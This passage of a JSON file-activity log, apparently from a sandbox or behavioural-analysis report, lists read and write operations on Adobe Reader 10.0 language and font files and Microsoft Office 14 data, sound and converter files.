10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nl_NL.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nl_nl.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nl_NL_PREEURO.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nl_nl_preeuro.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nn_NO.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nn_no.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.pl.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.pl.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.pl_PL.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.pl_pl.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.pt_BR.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.pt_br.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.pt_PT.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.pt_pt.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.pt_PT_PREEURO.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.pt_pt_preeuro.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ro.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ro.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ro_RO.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ro_ro.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ru.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ru.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ru_RU.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ru_ru.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ru_UA.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ru_ua.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sk.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sk.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sk_SK.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sk_sk.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sl.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sl.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sl_SI.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sl_si.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sv.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sv.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sv_FI.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sv_fi.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sv_SE.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sv_se.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.tr.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.tr.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.tr_TR.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.tr_tr.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.uk.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.uk.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.uk_UA.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.uk_ua.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.zh_CN.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.zh_cn.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.zh_TW.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.zh_tw.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.zh_TW_STROKE.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.zh_tw_stroke.txt", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeArabic-Bold.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobearabic-bold.otf", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeArabic-BoldItalic.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobearabic-bolditalic.otf", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeArabic-Italic.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobearabic-italic.otf", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeArabic-Regular.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobearabic-regular.otf", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeHebrew-Bold.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobehebrew-bold.otf", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeHebrew-BoldItalic.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobehebrew-bolditalic.otf", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeHebrew-Italic.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobehebrew-italic.otf", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeHebrew-Regular.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobehebrew-regular.otf", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobePiStd.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobepistd.otf", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeThai-Bold.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobethai-bold.otf", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeThai-BoldItalic.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobethai-bolditalic.otf", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeThai-Italic.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobethai-italic.otf", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeThai-Regular.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobethai-regular.otf", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\CourierStd-Bold.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\courierstd-bold.otf", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\CourierStd-BoldOblique.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\courierstd-boldoblique.otf", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\CourierStd-Oblique.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\courierstd-oblique.otf", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\CourierStd.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\courierstd.otf", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MinionPro-Bold.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\minionpro-bold.otf", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MinionPro-BoldIt.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\minionpro-boldit.otf", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MinionPro-It.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\minionpro-it.otf", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MinionPro-Regular.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\minionpro-regular.otf", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MyriadPro-Bold.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\myriadpro-bold.otf", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MyriadPro-BoldIt.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\myriadpro-boldit.otf", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MyriadPro-It.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\myriadpro-it.otf", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MyriadPro-Regular.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\myriadpro-regular.otf", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\SY______.PFB", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\sy______.pfb", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\ZX______.PFB", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\zx______.pfb", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\ZY______.PFB", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\zy______.pfb", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeFanHeitiStd-Bold.otf", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\adobefanheitistd-bold.otf", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\OCRHC.DAT", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\ocrhc.dat", "operations": [ "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\OCRVC.DAT", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\ocrvc.dat", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\OLKIRM.XML", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\olkirm.xml", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\OLKIRMV.XML", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\olkirmv.xml", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\OMML2MML.XSL", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\omml2mml.xsl", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\ONENOTEIRM.XML", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\onenoteirm.xml", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\ORMMODEL.MDL", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\ormmodel.mdl", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\OUTLFLTR.DAT", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\outlfltr.dat", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\LoginDialogBackground.jpg", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\logindialogbackground.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierBackgroundRTL.jpg", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\notifierbackgroundrtl.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\PicturesToolIconImages.jpg", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\picturestooliconimages.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\Shared16x16Images.jpg", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\shared16x16images.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\WebToolIconImages.jpg", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\webtooliconimages.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\CAN.WAV", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\sounds\\things\\can.wav", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\COUPLER.WAV", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\sounds\\things\\coupler.wav", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\HORN.WAV", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\sounds\\things\\horn.wav", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\SHOT.WAV", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\sounds\\things\\shot.wav", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\SHOVEL.WAV", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\sounds\\things\\shovel.wav", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\SPLASH.WAV", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\sounds\\things\\splash.wav", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\WHOOSH.WAV", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\sounds\\things\\whoosh.wav", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\ALARM.WAV", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\alarm.wav", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\BUZZ.WAV", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\buzz.wav", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\LASER.WAV", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\laser.wav", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\RADAR.WAV", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\radar.wav", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\TOOT.WAV", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\toot.wav", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\VIBE.WAV", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\vibe.wav", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\WARN.WAV", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\warn.wav", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\COUGH.WAV", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\sounds\\people\\cough.wav", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\GIGGLE.WAV", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\sounds\\people\\giggle.wav", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\SNEEZE.WAV", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\sounds\\people\\sneeze.wav", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\THROAT.WAV", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\sounds\\people\\throat.wav", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\Whistling.wav", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\sounds\\people\\whistling.wav", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOML.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\infoml.ico", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Document Parts\\1033\\14\\Built-In Building Blocks.dotx", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\document parts\\1033\\14\\built-in building blocks.dotx", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ACT3.SAM", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\convert\\act3.sam", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DELIMDOS.FAE", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\convert\\delimdos.fae", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DELIMWIN.FAE", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\convert\\delimwin.fae", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DESKSAM.SAM", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\convert\\desksam.sam", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ODBC.SAM", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\convert\\odbc.sam", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OL.SAM", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\convert\\ol.sam", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLADD.FAE", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\convert\\oladd.fae", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLAPPT.FAE", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\convert\\olappt.fae", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLJRNL.FAE", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\convert\\oljrnl.fae", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLMAIL.FAE", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\convert\\olmail.fae", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLNOTE.FAE", "hashes": [], "norm_filename": "c:\\program files\\microsoft 